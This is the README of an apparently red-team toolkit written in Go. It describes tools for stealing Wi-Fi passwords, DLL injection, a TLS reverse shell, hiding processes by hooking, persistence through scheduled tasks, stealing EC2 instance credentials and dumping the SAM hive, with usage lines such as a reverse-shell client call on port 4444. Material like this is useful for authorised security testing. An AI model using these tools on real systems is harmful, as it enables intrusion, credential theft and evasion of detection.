Skip to content

Latest commit

 

History

History
75 lines (43 loc) · 2.16 KB

README.md

File metadata and controls

75 lines (43 loc) · 2.16 KB

Mal(icous)Go

Disclaimer

Should only be used for systems that you have explicit permission to target, I take no responsibility for actions performed using any code from this repository.

Use at your own risk!

wifi pwds

Retrieve WLAN passwords from Windows. Uses native calls in Win32 API rather than executing netsh wlan ... as a command, this approach is more stealthy!

inject

Injects a DLL into a remote process uses the classic on disk / LoadLibrary approach so should be used primarily for testing as it is not opsec safe.

Usage:

inject_x64.exe <dll_path> <pid>

rshell

Simple reverse shell implementation client supports comms over TLS using the tlsserver.go server code.

client

Certificate is embedded into the compiled binary, update to a newly created cert.

client -tls -port 4444 <host>

server

tlsserver -port 4444 <cert> <key>

proxy

Simple TCP proxy

proxy <port> <host:port>

persistence

A PoC to test adding a scheduled task into windows via COM/OLE rather than the noisey approach of using schtasks.exe. Please adjust to your needs!

hideproc

Uses IAT hooking to hook into the low level NtQuerySystemInformation function import from ntdll.dll and hide processes based on an image name. Also includes a test executable to test against. Simply inject the DLL into the process you want to hide processes from.

Also demonstrates being able to read the PE including the IAT entries in-memory.

Code could be adjusted to perform other tasks.

imdsdump

Find yourself on an EC2 instance with an assigned role?! This will use the IMDS to retrieve the temporary creds. Useful if the EC2 host is locked down making it tricky to call the service using other methods and also supports working against IMDSv2 that requires a token.

Compiles to an exe however the code could be changed and compiled as a DLL to be used in-memory to be more stealty or when app blocking is in place.

samdump

Dumps the SAM & SYSTEM registry hives using Win32 API calls to allow offline cracking of the password hashes. More stealthy than using the reg commands or a well known program.

Usage:

samdump_x64.exe <dir>